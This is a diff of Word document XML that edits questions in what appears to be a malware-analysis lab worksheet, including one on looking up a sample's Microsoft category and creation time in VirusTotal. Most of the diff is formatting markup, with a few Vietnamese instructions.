+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>techniques</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -578,60 +874,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>extract</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>configuration</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>details</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>and</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -650,52 +892,52 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>map</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>observed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>tactics</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to MITRE ATT&amp;CK.</w:t>
+        <w:t>privilege</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>escalation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>mechanisms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -730,43 +972,115 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Determining</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>creation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>time</w:t>
+        <w:t>Categorizing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>enables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>quicker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>clearer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>understanding</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -793,7 +1107,223 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>unique</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>behaviors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vectors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>has</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Microsoft </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identified</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -811,196 +1341,16 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>provide</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>insights</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>into</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>origin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>What</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>was</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>time</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>creation</w:t>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>VirusTotal</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1010,96 +1360,19 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:t>?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="40"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dùng </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Virustotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> để xác định thời gian </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>virus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> này được tạo ra, tại phần </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>details</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> củ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
